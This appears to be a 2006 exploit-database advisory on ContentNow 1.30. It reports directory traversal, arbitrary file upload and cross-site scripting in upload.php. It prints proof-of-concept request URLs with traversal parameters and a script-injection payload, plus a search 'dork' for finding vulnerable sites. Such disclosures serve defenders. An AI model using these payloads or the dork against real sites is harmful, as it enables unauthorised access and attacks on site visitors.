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ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting

🗓️ 14 Nov 2006 00:00:00Reported by TimqType 
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Arbitrary File Upload / Cross-Site Scripting vulnerability in ContentNow 1.3

Code
ContentNow Directory Traversal(upload.php)
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-vulnerability By: Timq 
-http://securitydb.org
-Team Root-Shell
-Email:timq[at]hushmail.com
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It appears that it is possible to view any files on a system via 'upload.php'.
Proper filtering not in affectfor the 'path' and 'folder' variables.  You can also upload
malicious files to where you have access through 'upload.php'.
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~PoC
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http://site.com/cn/upload.php?path=/
http://site.com/cn/upload.php?folder=/
XSS:
http://site.com/cn/upload.php?path="><script>alert("xss")</script>
D0rk:
intitle:intitle:ContentNow 
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shouts:Warpboy,Zeusixsixsix,Stansar,Preddy,OG,PunkerX,Ethernet,str0ke,Gamma,Maggot
everyone else
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# milw0rm.com [2006-11-14]

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